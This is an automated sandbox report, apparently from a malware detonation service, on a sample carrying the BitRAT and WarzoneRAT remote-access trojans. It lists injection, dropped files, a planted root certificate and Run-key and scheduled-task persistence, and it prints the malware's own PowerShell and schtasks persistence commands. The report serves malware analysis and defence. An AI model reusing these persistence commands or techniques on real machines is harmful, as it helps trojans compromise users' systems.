Malware Analysis Report

2025-01-03 05:12

Sample ID 221215-qnkk6sfd7s
Target 8565653741.zip
SHA256 3e2465a42ff87f207327dce94ed7ca4f78c070481ebdb42056b4c10f0a65b6e1
Tags bitrat warzonerat infostealer persistence rat trojan
Score 10/10

Analysis Overview

Score 10/10

SHA256 3e2465a42ff87f207327dce94ed7ca4f78c070481ebdb42056b4c10f0a65b6e1

Threat Level: Known bad

The file 8565653741.zip was found to be: Known bad.

Malicious Activity Summary

bitrat warzonerat infostealer persistence rat trojan

WarzoneRat, AveMaria

BitRAT

Suspicious use of NtCreateUserProcessOtherParentProcess

Executes dropped EXE

Modifies Installed Components in the registry

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Modifies system certificate store

Modifies registry class

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2022-12-15 13:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2022-12-15 13:24

Reported 2022-12-15 13:27

Platform win7-20220812-en

Max time kernel 150s

Max time network 43s

Command Line

C:\Windows\system32\lsass.exe

Signatures

BitRAT

trojan bitrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 1472 created 416 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe
PID 1624 created 416 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe

WarzoneRat, AveMaria

rat infostealer warzonerat

Modifies Installed Components in the registry

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1476 set thread context of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1472 set thread context of 1196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe
PID 1624 set thread context of 2144 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\GoogleUpdate.dll | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df48109110d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (data) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\cmd.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A

Suspicious use of UnmapMainImage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\svchost.exe | N/A
N/A | N/A | C:\Windows\System32\svchost.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1476 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1996 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 604 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 604 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 604 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 604 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\SysWOW64\cmd.exe
PID 604 wrote to memory of 840 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 604 wrote to memory of 840 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 604 wrote to memory of 840 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 604 wrote to memory of 840 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1476 wrote to memory of 1452 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1096 wrote to memory of 1792 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1792 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1792 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1792 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 524 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 1560 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 568 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 568 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 568 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 568 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 1572 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 1572 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 1572 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 1572 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 2008 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 1096 wrote to memory of 2008 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 1096 wrote to memory of 2008 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 1096 wrote to memory of 2008 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 2040 wrote to memory of 1472 | N/A | C:\Windows\system32\taskeng.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2040 wrote to memory of 1472 | N/A | C:\Windows\system32\taskeng.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2040 wrote to memory of 1472 | N/A | C:\Windows\system32\taskeng.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

\\?\C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe

"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

